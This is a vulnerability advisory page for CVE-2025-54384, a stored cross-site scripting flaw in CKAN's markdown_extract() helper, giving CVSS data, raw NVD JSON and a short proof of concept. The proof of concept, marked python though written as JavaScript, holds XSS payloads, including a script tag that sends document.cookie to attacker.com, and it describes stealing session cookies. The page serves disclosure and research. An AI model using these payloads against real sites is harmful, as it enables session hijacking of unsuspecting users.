Security Vulnerability Report
中文
CVE-2025-54384 CVSS 6.3 MEDIUM

CVE-2025-54384

Published: 2025-10-29 16:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.9 and 2.11.4, the helpers.markdown_extract() function did not perform sufficient sanitization of input data before wrapping in an HTML literal element. This helper is used to render user-provided data on dataset, resource, organization or group pages (plus any page provided by an extension that used that helper function), leading to a potential XSS vector. This vulnerability has been fixed in CKAN 2.10.9 and 2.11.4.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CKAN < 2.10.9
CKAN < 2.11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-54384 XSS PoC - CKAN markdown_extract() Sanitization Bypass // This PoC demonstrates the stored XSS vulnerability in CKAN's markdown_extract helper // Attacker submits malicious Markdown content when creating/updating a dataset: const maliciousMarkdown = ` # Malicious Dataset Some description with <img src=x onerror=alert(document.cookie)> embedded. Or using script tag: <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> Or event handler on any element: <div onmouseover=alert('XSS')>Hover over me</div> `; // When CKAN renders the dataset page using markdown_extract(), // the malicious HTML/JS is rendered without proper sanitization, // leading to XSS execution in victim's browser. // Example attack scenario: // 1. Attacker creates a dataset with malicious description // 2. Victim (admin/user) views the dataset page // 3. Malicious JS executes in victim's browser context // 4. Attacker can steal session cookies, perform actions as victim // Note: This PoC is for educational and security testing purposes only. // Always obtain proper authorization before testing vulnerabilities.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54384", "sourceIdentifier": "[email protected]", "published": "2025-10-29T16:15:33.893", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.9 and 2.11.4, the helpers.markdown_extract() function did not perform sufficient sanitization of input data before wrapping in an HTML literal element. This helper is used to render user-provided data on dataset, resource, organization or group pages (plus any page provided by an extension that used that helper function), leading to a potential XSS vector. This vulnerability has been fixed in CKAN 2.10.9 and 2.11.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/ckan/ckan/commit/6d0065f2fc7e2682196d125275af34b93e9e554e", "source": "[email protected]"}, {"url": "https://github.com/ckan/ckan/security/advisories/GHSA-2r4h-8jxv-w2j8", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.